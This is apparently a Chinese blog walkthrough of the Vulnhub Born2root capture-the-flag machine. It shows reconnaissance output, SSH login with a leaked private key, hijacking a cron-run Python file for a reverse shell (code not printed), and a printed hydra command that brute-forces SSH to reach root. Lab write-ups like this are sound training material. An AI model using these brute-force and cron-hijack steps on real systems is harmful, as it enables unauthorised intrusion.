Yoga7xm's Blog

Vulnhub之born2boot

vulnhub
字数统计: 1.8k阅读时长: 9 min
2019/01/10 Share

0x00 前言

近来考试有点压抑,抽空来个靶机玩玩

0x01 靶机地址

https://www.vulnhub.com/entry/born2root-1,197/

0x02 环境搭建

下载好的voa导入VB中即可

  • 靶机:192.168.43.182
  • kali:192.168.43.156
  • win:192.168.43.208

0x03 Play

1.信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
root@kali:~# nmap -sS -T4 -A -p- -v 192.168.43.182
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-03 20:44 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating ARP Ping Scan at 20:44
Scanning 192.168.43.182 [1 port]
Completed ARP Ping Scan at 20:44, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:44
Completed Parallel DNS resolution of 1 host. at 20:44, 0.80s elapsed
Initiating SYN Stealth Scan at 20:44
Scanning 192.168.43.182 [65535 ports]
Discovered open port 80/tcp on 192.168.43.182
Discovered open port 111/tcp on 192.168.43.182
Discovered open port 22/tcp on 192.168.43.182
Discovered open port 40635/tcp on 192.168.43.182
Completed SYN Stealth Scan at 20:44, 7.25s elapsed (65535 total ports)
Initiating Service scan at 20:44
Scanning 4 services on 192.168.43.182
Completed Service scan at 20:44, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.182
NSE: Script scanning 192.168.43.182.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.36s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.01s elapsed
Nmap scan report for 192.168.43.182
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          40635/tcp  status
|_  100024  1          58402/udp  status
40635/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Sun Feb  3 20:41:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.43.182

NSE: Script Post-scanning.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.28 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

只有一个80端口的web服务和22的ssh端口开放,只能从80下手了

2.目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~# dirb http://192.168.43.182 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb  3 20:49:46 2019
URL_BASE: http://192.168.43.182/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.43.182/ ----
==> DIRECTORY: http://192.168.43.182/files/                                     
==> DIRECTORY: http://192.168.43.182/icons/                                     
+ http://192.168.43.182/index.html (CODE:200|SIZE:5651)                         
==> DIRECTORY: http://192.168.43.182/manual/                                    
+ http://192.168.43.182/robots.txt (CODE:200|SIZE:57)                           
+ http://192.168.43.182/server-status (CODE:403|SIZE:302)                       
                                                                                
-----------------
END_TIME: Sun Feb  3 20:49:57 2019
DOWNLOADED: 4612 - FOUND: 3

发现了icons、files文件夹,还有一个robots.txt

3.漏洞探测

icons文件夹发现了一个目录遍历漏洞,而files文件夹为空,robots文件得到的文件夹也为空。

打开 http://192.168.43.182/icons/VDSoyuAXiO.txt 发现是一个RSA的私钥文件,可能是ssh的私钥文件,所以将其保存为id_rsa文件,然后登录ssh,用户名可能为MartinHadiJimmyroot

逐一测试后,利用Martin登录成功

成功登录,查看passwd文件,找出所有系统用户 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
martin@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

存在 martin、jimmy、hadi、root四个系统用户

然后继续查找其他俩用户的文件,无果。

1
2
3
4
5
6
7
8
9
10
11
12
martin@debian:~$ find / -user hadi 2>/dev/null
/home/hadi
/home/hadi/.bash_logout
/home/hadi/.ssh
/home/hadi/.ssh/authorized_keys
/home/hadi/.profile
/home/hadi/.bashrc
martin@debian:~$ find / -user jimmy 2>/dev/null
/home/jimmy
/var/mail/jimmy
martin@debian:~$ cat /var/mail/jimmy
cat: /var/mail/jimmy: Permission non accordée

查看定时任务cat /etc/crontab,发现一个所属Jimmy的py文件,也就是每五分钟执行一次 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
martin@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5   * * * *   jimmy   python /tmp/sekurity.py

所以创建一个反弹shell的sekurity.py文件,监听端口,成功反弹

但是在这个用户里头没有发现什么可以用于提权的线索,只能借助第三个用户hadi,利用在线字典生成器生成一个字典,然后借助神器hydra进行爆破 传送门

爆破成功,密码为hadi123

hydra -l hadi -P hadi.txt -t 50 -e ns 192.168.43.182 ssh

登录上hadi过后,直接成功切换为root,查看flag内容。 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@debian:~# cat flag.txt
                                                                      
,-----.                         ,---. ,------.                 ,--.   
|  |) /_  ,---. ,--.--.,--,--, '.-.  \|  .--. ' ,---.  ,---. ,-'  '-.
|  .-.  \| .-. ||  .--'|      \ .-' .'|  '--'.'| .-. || .-. |'-.  .-'
|  '--' /' '-' '|  |   |  ||  |/   '-.|  |\  \ ' '-' '' '-' '  |  |   
`------'  `---' `--'   `--''--''-----'`--' '--' `---'  `---'   `--'   


Congratulations ! you  pwned completly Born2root's CTF .

I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p

I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...

Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !

Enumeration is The Key .


Give me feedback :[FB] Hadi Men

0x04 总结

其实这个靶机比较基础,利用目录遍历漏洞找到一个ssh公钥,然后通过该公钥爆破用户名,成功登录拿到Martin的shell,然后cat passwd文件,找出其他的系统用户,然后全局搜索文件,发现一个定时任务的py文件,利用该文件写入反弹shell命令,拿到jimmy的shell,但是用处不大,于是就直接爆破

hadi的密码,最后hadi用户可以直接切换至root权限,拿到flag!!!

CATALOG
  1. 1. 0x00 前言
  2. 2. 0x01 靶机地址
  3. 3. 0x02 环境搭建
  4. 4. 0x03 Play
    1. 4.1. 1.信息收集
    2. 4.2. 2.目录扫描
    3. 4.3. 3.漏洞探测
  5. 5. 0x04 总结
Total : 65
2020
2019
2018
Git Exchange 内网渗透 vulnhub CTF php blog java CORS JSONP deserialize sql注入 web mysql unserialize xxe XSS ctf Mysql Web 隧道 redis 未授权 RFI smtp ssrf Linux vulnstack weblogic cryptology